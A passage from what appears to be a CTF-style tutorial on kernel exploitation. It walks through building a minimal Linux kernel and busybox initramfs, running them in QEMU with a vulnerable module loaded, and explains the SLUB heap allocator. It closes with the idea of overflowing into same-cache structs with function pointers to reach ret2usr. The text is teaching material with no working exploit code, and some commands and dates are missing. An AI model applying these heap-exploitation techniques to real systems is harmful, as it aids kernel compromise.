CONFIG_TMPFS - enables support for the tmpfs in-memory filesystem
CONFIG_RELOCATABLE - builds a relocatable kernel that can be loaded at different physical addresses
CONFIG_RANDOMIZE_BASE - enables KASLR support
CONFIG_USERFAULTFD - enables support for the userfaultfd system call, which allows handling of page faults in user space
In order to update the minimal .config with these options, we use the provided merge_config.sh script:
Building
That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage. This is the same bzImage that you get in CTF challenges.
We now have a minimal kernel bzImage and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.
To do this, we use busybox, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.
We will download and extract busybox; you can find the latest version here.
We also create an output folder for compiled versions.
Now compile it statically. We're going to use the menuconfig option, so we can make some choices.
Once the menu loads, hit Enter on Settings. Hit the down arrow key until you reach the option Build static binary (no shared libs). Hit Space to select it, and then Escape twice to leave. Make sure you choose to save the configuration.
Now, make it with the new options
Now we make the file system.
The last thing missing is the classic init script, which gets run on system load. A provisional one works fine for now:
Make it executable
Finally, we're going to bundle it into a cpio archive, which is understood by QEMU.
The -not -name *.cpio is there to prevent the archive from including itself
You can even compress the filesystem to a .cpio.gz file, which QEMU also recognises
If we want to extract the cpio archive (say, during a CTF) we can use this command:
Loading it with QEMU
Put bzImage and initramfs.cpio into the same folder. Write a short run.sh script that loads QEMU:
Explanation of Flags
-kernel bzImage - sets the kernel to be our compiled bzImage
-initrd initramfs.cpio - provide the file system
-append ... - basic features; in the future, this flag is also used to set protections
console=ttyS0 - Directs kernel messages to the first serial port (ttyS0)
quiet
-monitor /dev/null - Disable the QEMU monitor
-nographic - Disable GUI, operate in headless mode (faster)
no-reboot - Do not automatically restart the VM when encountering a problem (useful for debugging and working out why it crashes, as the crash logs will stay).
Once we make this executable and run it, we get loaded into a VM!
User Accounts
Right now, we have a minimal linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:
This is because /etc/passwd and /etc/group don't exist, so we can just create those!
Loading the Kernel Module
The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.
First, we copy the .ko file to the filesystem root. Then we modify the init script to load it, and also set the UID of the loaded shell to 1000 (so we are not root!).
Here I am assuming that the major number of the double_fetch module is 253.
Why am I doing that?
If we load into a shell and run cat /proc/devices, we can see that double_fetch is loaded with major number 253 every time. I can't find any way to load this in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!
Compiling a Different Kernel Version
If we want to compile a kernel version that is not the latest, we'll dump all the tags:
It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:
We then continue from there.
Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.
Kernel Heap
The pain of it all
Historically, the Linux kernel has had three main heap allocators: SLOB, SLAB and SLUB.
SLUB is the latest version, replacing SLAB as of . SLOB was used as the backup to SLAB and SLUB, but was removed in . As a result, SLUB is all we really have to care about (even pre-6.4, SLOB was practically never used). From here on out, we will only talk about SLUB, unless explicitly stated.
Note that, confusingly, "chunks" in the kernel heap are called objects and they are stored in slabs.
$ make allnoconfig
YACC scripts/kconfig/parser.tab.[ch]
HOSTCC scripts/kconfig/lexer.lex.o
HOSTCC scripts/kconfig/menu.o
HOSTCC scripts/kconfig/parser.tab.o
HOSTCC scripts/kconfig/preprocess.o
HOSTCC scripts/kconfig/symbol.o
HOSTCC scripts/kconfig/util.o
HOSTLD scripts/kconfig/conf
#
# configuration written to .config
#
CONFIG_64BIT=y
CONFIG_SMP=y
CONFIG_PRINTK=y
CONFIG_PRINTK_TIME=y
CONFIG_PCI=y
# We use an initramfs for busybox with elf binaries in it.
CONFIG_BLK_DEV_INITRD=y
CONFIG_RD_GZIP=y
CONFIG_BINFMT_ELF=y
CONFIG_BINFMT_SCRIPT=y
# This is for /dev file system.
CONFIG_DEVTMPFS=y
# For the power-down button (triggered by qemu's `system_powerdown` command).
CONFIG_INPUT=y
CONFIG_INPUT_EVDEV=y
CONFIG_INPUT_KEYBOARD=y
CONFIG_MODULES=y
CONFIG_KPROBES=n
CONFIG_LTO_NONE=y
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y
CONFIG_EMBEDDED=n
CONFIG_TMPFS=y
CONFIG_RELOCATABLE=y
CONFIG_RANDOMIZE_BASE=y
CONFIG_USERFAULTFD=y
Unlike the glibc heap, SLUB has fixed sizes for objects, which are powers of 2 up to 8192 along with 96 and 192. These are conveniently called kmalloc-8, kmalloc-16, kmalloc-32 , kmalloc-64,kmalloc-96, kmalloc-128, kmalloc-192, kmalloc-256, kmalloc-512, kmalloc-1k, kmalloc-2k, kmalloc-4k and kmalloc-8k. We call these individual classifications caches, and they are comprised of slabs.
Each slab is assigned its own area of memory and comprised of 1 or more continuous pages. If the kernel wants to allocate space in the heap, it will call kmalloc and pass it the size (and some flags). The size will be rounded up to fit in the smallest possible cache, then assigned there. Anything larger than 8192 bytes will not use kmalloc at all, and uses page_alloc instead.
This approach is a massive performance improvement. It can also make exploitation primitives harder, as every object is the same size and it's harder to overlap. Similarly, because the sizes are determined by the cache rather than metadata, we cannot fake size.
Slab Creation
We can get to a point where we have so many objects in a cache that they fill all of the slabs. In this case, a new slab is created. This slab does not create the singular object - it will create multiple objects. Why? Because the kernel knows that this slab is only used for kmalloc-1k objects, it creates all possible objects immediately and marks the remaining as free.
These remaining three are saved in the freelist in a random order, provided that the configuration CONFIG_SLAB_FREELIST_RANDOM is enabled (which it is by default).
The default size of slabs depends on the cache it is being used for. You can read /proc/slabinfo to see the current configuration for the system:
Here objsize is the size of each element in the cache, and objsperslab is the number of objects created at once when a new slab is initialized. Then pagesperslab is the product of objsize/0x1000 (pages per object) and objperslab, and tells you how many pages each slab has.
TODO CONFIG_SLAB_FREELIST_HARDENED.
The Kernel Heap is Global
One major difference between user- and kernel-mode heap exploitation is that the kernel heap is shared between all kernel processes. Kernel modules and every other aspect of the kernel use the same heap.
So, let's say you find some sort of kernel heap primitive - an overflow, for example. Overflowing into identical objects might not be helpful, but in the kernel, we can find common structs with powerful primitives that we can use to our advantage. Imagine that there is a struct that contains a function pointer, and you can trigger a call to this function. If this struct is allocated to the same cache as the object you can overflow, it is possible to allocate this struct such that it inhabits the object located directly behind in memory. Suddenly the overflow is incredibly powerful, and can lead immediately to something like a ret2usr.